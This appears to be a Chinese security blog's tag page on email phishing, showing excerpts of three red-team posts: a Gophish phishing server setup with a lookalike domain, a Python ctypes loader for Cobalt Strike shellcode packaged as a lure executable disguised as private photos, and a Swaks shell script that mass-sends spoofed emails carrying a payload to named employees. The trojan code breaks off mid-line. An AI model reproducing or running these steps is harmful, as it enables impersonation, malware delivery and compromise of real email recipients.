Snowming04's Blog

标签 - 邮件钓鱼

gophish+自己搭建邮件服务器
? gophish ? ? 邮件钓鱼 ?    2020-01-10 17:23:40    8272    0    0

@大家好.... hw.... 练习生 .... 唱 跳 rap 和 篮球...snowming

0. 前言

此文写于护网期间(2019年6月6日),彼时刚刚回国,就碰上了护网,弥足珍贵的经历。

1. Gophish 搭建

Gophish 是一个功能强大的开源网络钓��框架。
Github 地址:https://github.com/gophish/gophish

安装运行非常简单:

STEP1:https://github.com/gophish/gophish/releases/下载适合自己的zip包至自己的VPS。

我下载的是:

title

  1. wget https://github.com/gophish/gophish/releases/download/0.7.1/gophish-v0.7.1-linux-64bit.zip

解压完有以下这些文件:

title

STEP2:修改 config.json:

要注意:

  • admin_server 把 127.0.0.1 改为 0.0.0.0,然后最好不要使用默 认3333 端口,亲测这个端口可能因为某种人为因素不通,改为 443 是最稳的。
  • listen_url 也要是 0.0.0.0,如果 80 端口被占用了可以改为其他端口比如 81。
  • contact_address 不是一定要加上的,可以加一个。

title

STEP3:./gophish 运行(如果不行就加个sudo):

title

STEP4: 快乐访问admin后台:https://VPS IP: admin_server的监听端口

比如我的就是 https://148.70.xx.xx:443

title

使用默认账号密码 admin gophish 来 login。

title

就进入了后台:

title

2. 近似域名

比如说我想对一个叫snowm1ng的公司钓鱼,他们公司的邮件格式是: xxx@snowm1ng.me。
那么为了发钓��邮件,我就专门去狗爹购买了一个近似域名 snowming.me,这样的话后面我们就可以以 admin@snowming.me 为发件人去发一些钓鱼邮件。

在此近似域名的DNS管理

雪茗私房照.exe
? 木马 ? ? 邮件钓鱼 ?    2020-01-10 17:23:38    1773    0    0

@大家好.... hw.... 练习生 .... 唱 跳 rap 和 篮球...snowming

前言

此文写于护网期间(2019年6月6日),彼时刚刚回国,就碰上了护网,弥足珍贵的经历。

雪茗私房照.exe 主要是 gophish+自己搭建邮件服务器 这篇文章里面用到的木马。

在本文中,详细介绍了此木马文件的制作过程。

第一步、设置 Cobalt Strike 客户端中的 Listener:

title

第二步、payload generator --> 生成shellcode

title

title

title

第三步、python+shellcode 得到 test.py

  1. from ctypes import *
  2. import ctypes
  5. #shellcode代码
  8. #libc = CDLL('libc.so.6')
  9. PROT_READ = 1
  10. PROT_WRITE = 2
  11. PROT_EXEC = 4
  13. def executable_code(buffer):
  14.     buf = c_char_p(buffer)
  15.     size = len(buffer)
  16.     addr = libc.valloc(size)
  17.     addr = c_void_p(addr)
  18.     if 0 == addr: 
  19.         raise Exception("Failed to allocate memory")
  20.     memmove(addr, buf, size)
  21.     if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
  22.         raise Exception("Failed to set protection on buffer")
  23.     return addr
  25. VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
  26. VirtualProtect = ctypes.windll.kernel32.VirtualProtect
  27. shellcode = bytearray(buf)
  28. whnd = ctypes.windll.k
Swaks 伪造邮件三分钟方案
? 邮件钓鱼 ? ? Swaks ?    2020-01-10 17:23:37    2122    0    0

1、买近似域名绑定 QQ 邮箱的域名邮箱

2、 确定邮件模板,下载 eml。可以通过 foxmail 对 eml 再次编辑或者修改纯文本。

3 、sh 脚本跑 swaks 批量发。

  1. #!/bin/bash                             
  2.  sleep 10s 
  3. ./swaks --header-X-Mailer   whu-online.cn   --to    zhangsan@whu.com.cn --from  OA@whu-online.cn    --data  ./payload.eml
  4.  sleep 10s 
  5. ./swaks --header-X-Mailer whu-online.cn --to lisi@whu.com.cn --from OA@whu-online.cn --data ./payload.eml

注1:whu-online.cn 为伪造的域名域,也可以写 foxmail.com,qq.com 等。
注2:我就是通过这种弱智 sh 脚本批量发的,怎么写成这种 n 行的 sh 脚本呢?写一个 python 脚本把批量发的目标依次拼接成 shell 语句。